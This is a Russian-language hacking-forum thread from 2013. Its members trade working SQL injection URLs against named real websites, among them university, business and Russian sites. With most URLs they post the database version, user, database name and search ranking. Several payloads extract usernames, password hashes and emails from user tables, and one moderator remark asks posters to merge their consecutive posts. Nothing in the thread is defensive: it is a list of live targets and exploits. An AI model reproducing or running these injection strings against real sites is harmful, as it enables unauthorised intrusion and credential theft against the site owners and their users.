HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15361  
Старый 19.01.2013, 00:12
FunOfGun
Guest
Сообщений: n/a
Провел на форуме:
109228

Репутация: 124
По умолчанию

http://www.asra.com/e-news.php?id=-2+union+select+1,@@version,3,4,5,user()+--+ //root

http://www.casatuscany.com/about/page.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20+--+ //4.1

http://www.bbkingblues.com/bio.php?id=-2388+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52+--+ //4.1

http://www.carkitinc.com/carkit2.php?id=-12+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16,17+--+
 
Ответить с цитированием

  #15362  
Старый 20.01.2013, 17:24
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию

http://www.i-teco.ru/news-arh.php?id=999999.9' union all select (select concat(0x27,0x7e,unhex(Hex(cast(wpb_users.user_log in as char))),0x5e,unhex(Hex(cast(wpb_users.user_pass as char))),0x5e,unhex(Hex(cast(wpb_users.user_email as char))),0x5e,unhex(Hex(cast(wpb_users.user_nicenam e as char))),0x27,0x7e) from `structure_i`.wpb_users limit 0,1) ,0x31303235343830303536,0x31303235343830303536-- a

http://brown.edu/scs/undergrad/catalog/course.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(version() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

// 2 поста подряд с разницей в пару часов

// Я за тебя объединять должен ?

// BigBear


извиняй
 
Ответить с цитированием

  #15363  
Старый 22.01.2013, 18:02
\/IRUS
Guest
Сообщений: n/a
Провел на форуме:
118953

Репутация: 37
По умолчанию

http://www.ku.edu/ - The University of Kansas

Яндекс тИЦ (CY): 350

Google PageRank (PR): 7


boolean-based blind

Код:
Code:
http://www.ku.edu/academics/?school=1')+and+1=1+and+(''='
http://www.ku.edu/academics/?school=1')+RLIKE+IF(1=1,0x4d7953514c,0x28)+and+('1'='1
web server operating system: Linux Red Hat Enterprise 6 (Santiago)

web application technology: PHP 5.3.3, Apache 2.2.15

back-end DBMS: MySQL 4.1.13-standard
 
Ответить с цитированием

  #15364  
Старый 24.01.2013, 18:20
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию

Яндекс тИЦ (CY) 550

Google PageRank (PR) 6

http://www.world-history.ru/persons_about.phtml?Id_article=999999.9 union all select (select concat(0x27,0x7e,unhex(Hex(cast(users.login as char))),0x5e,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `history`.users limit 1,1) --
 
Ответить с цитированием

  #15365  
Старый 29.01.2013, 16:01
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

На сайте присутствует WAF и 3-5к трафика

Код:
Code:
http://www.lingvotech.com/index.php?section=docs&page=1&id_refer=6356%0dand(extractvalue(1,concat(0x3a,(select+/*!table_name*/+from+information_schema.`tables`+/*!where*/+table_schema=0x617634395f6c696e67766f+limit+0,1))))#
Version: 5.1.66-cll

Database: av49_lingvo

User: av49_lingvo@localhost

CY - 160

PR - 0
 
Ответить с цитированием

  #15366  
Старый 30.01.2013, 02:53
raptor.f22
Guest
Сообщений: n/a
Провел на форуме:
490

Репутация: 0
По умолчанию

Скуля:http://www.numismat-invest.ru/aukcion.php?id=0'+union+select+1,2,3,4,5,concat(0x 7e,version(),0x7c,user(),0x7c,database(),0x7e),7,8/*

version: 5.0.45-community-nt-log

user:1gb_niko@10.0.2.2

database: 1gb_niko

GooglePR: 1

YandexCY:10

Скуля:http://www.mmc-rspp.ru/bistubiseng.php?id=0'+union+select+1,2,3,concat(0x 7e,version(),0x7c,user(),0x7c,database(),0x7e),5,6 ,7+--+

version: 5.1.65

user:admin_mmtrours@localhost

database: admin_cmsmmcrspp

GooglePR: 3

YandexCY:50

Скуля:http://filerootspeed.ru/post.php?id=0'+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,concat(0x7e,version(),0x7c,user(),0x7c, database(),0x7e),16,17+--+

version: 5.1.66-cll

user:exarh758_dor1@localhost

database: exarh758_filerootspeed

GooglePR: 0

YandexCY:0

Скуля:http://www.blenheims.co.uk/leaseholdersandresidents/details.php?id=0+union+select+1,2,3,concat(0x7e,ve rsion(),0x7c,user(),0x7c,database(),0x7e)

version: 5.1.66-cll

user:groupbh_user@localhost

GooglePR: 1

YandexCY:0
 
Ответить с цитированием

  #15367  
Старый 30.01.2013, 21:34
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию

Яндекс тИЦ (CY) - 2000

Google PageRank (PR) - 6


http://bards.ru/' or 1=convert(int,@@version) and '1'='1

http://bards.ru/' or 1=convert(int,(char(126)+(select distinct top 1 table_name from (select distinct top 77 table_name from information_schema.tables order BY table_name ASC) sq order BY table_name DESC)+char(126))) and '1'='1
 
Ответить с цитированием

  #15368  
Старый 02.02.2013, 01:20
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://mercerproducts.com.au/details.php?id=-23+union+select+1,version(),3,4,5--
PHP/5.2.13-0.dotdeb.0

5.0.51a-24+lenny5

adzmer043@localhost

richardhayes
 
Ответить с цитированием

  #15369  
Старый 02.02.2013, 18:37
raptor.f22
Guest
Сообщений: n/a
Провел на форуме:
490

Репутация: 0
По умолчанию

Скуля:http://www.satcommobil.com/rentals.php?id=0+union+select+1,concat(0x7e,versio n(),0x7c,user(),0x7c,database(),0x7e),3,4,5,6

version: 4.1.24-log

user:satcommobil@68.178.254.198

database: satcommobil

Домен: www.satcommobil.com

GooglePR: 0

YandexCY:0

Скуля:http://telefon.sputnik-video.ru/index.php?id=0+union+select+1,2,3,4,5,6,concat(0x7 e,version(),0x7c,user(),0x7c,database(),0x7e),8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34+--+

version: 5.0.96-community-log

user:sputnik@localhost

database: sputnik_test

Домен: telefon.sputnik-video.ru

GooglePR: 2

YandexCY:0

Скуля:http://ausasustainingmembers.searchablelisting.com/viewDetails.php?id=0+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,concat(0x7e,version(),0x7c,use r(),0x7c,database(),0x7e),17,18

version: 5.0.96-log

user:dbo448644008@74.208.16.168

database: db448644008

Домен: ausasustainingmembers.searchablelisting.com

GooglePR: 4

YandexCY:0

Скуля:http://www.experiencedevelopment.org/news_stories_detail.php?id=0+union+select+1,2,conc at(0x7e,version(),0x7c,user(),0x7c,database(),0x7e ),4

version: 5.0.77

user:expdev@localhost

database: experiencedevelopment

Домен: www.experiencedevelopment.org

GooglePR: 5

YandexCY:0

Скуля:http://www.jpscu.com/page.php?id=0'+union+select+1,concat(0x7e,version( ),0x7c,user(),0x7c,database(),0x7e),3/*

version: 4.1.22

user:jpscocu@localhost

database: jpscu

Домен: www.jpscu.com

GooglePR: 1

YandexCY:0

// СГЕНЕРИРОВАНО МОДЕРАТОРОМ BigBear

// У меня терпение не железное...
 
Ответить с цитированием

  #15370  
Старый 03.02.2013, 21:06
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://www .uls.or .ug/details.php?load=uls&id=-23+uni on+select+1,2,3,4,5,version(),7,user(),9,10,11,12,13,14,15,16,database()--
5.1.66-cll

law2012_koleman

law2012_sindtalo@localhost
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ